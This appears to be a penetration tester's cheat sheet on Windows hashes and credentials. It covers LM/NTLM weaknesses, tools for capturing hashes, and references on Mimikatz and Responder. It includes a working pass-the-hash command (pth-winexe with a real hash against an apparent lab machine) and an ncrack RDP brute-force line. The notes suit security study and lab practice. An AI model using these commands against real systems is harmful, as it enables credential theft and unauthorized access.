Hashes and Credentials
LM hashes
- Password longer than 7 is split and each half hashed separately
- Passwords are converted into uppercase
- No salt
- Empty LM hash
AAD3B435B51404EE
AAD3B435B51404EEAAD3B435B51404EE
NTLM hashes
Dumping hashes
- Cannot copy SAM when sys is in use
Capturing Hashes
Responder
Inveigh
Impacket's smbserver.py
Pass the Hash
Auth using username and NTLM hash (since NTLM and LM hashes are not salted)
- Replace "no password" in dump wih empty LM hash
- Copy admins dumped hash (LM:NTML)
- export SMBHASH=LM:NTML
- pth-winexe -U administrator% //ip cmd
pth-winexe
pth-winexe
-U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
//10.10.10.63 cmd
RDP
ncrack -v -f --user administrator -P password.txt rdp://ip,CL=1
LSASS
References
- Extracting User Password Data with Mimikatz DCSync: https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
- Pwning with Responder – A Pentester’s Guide: https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/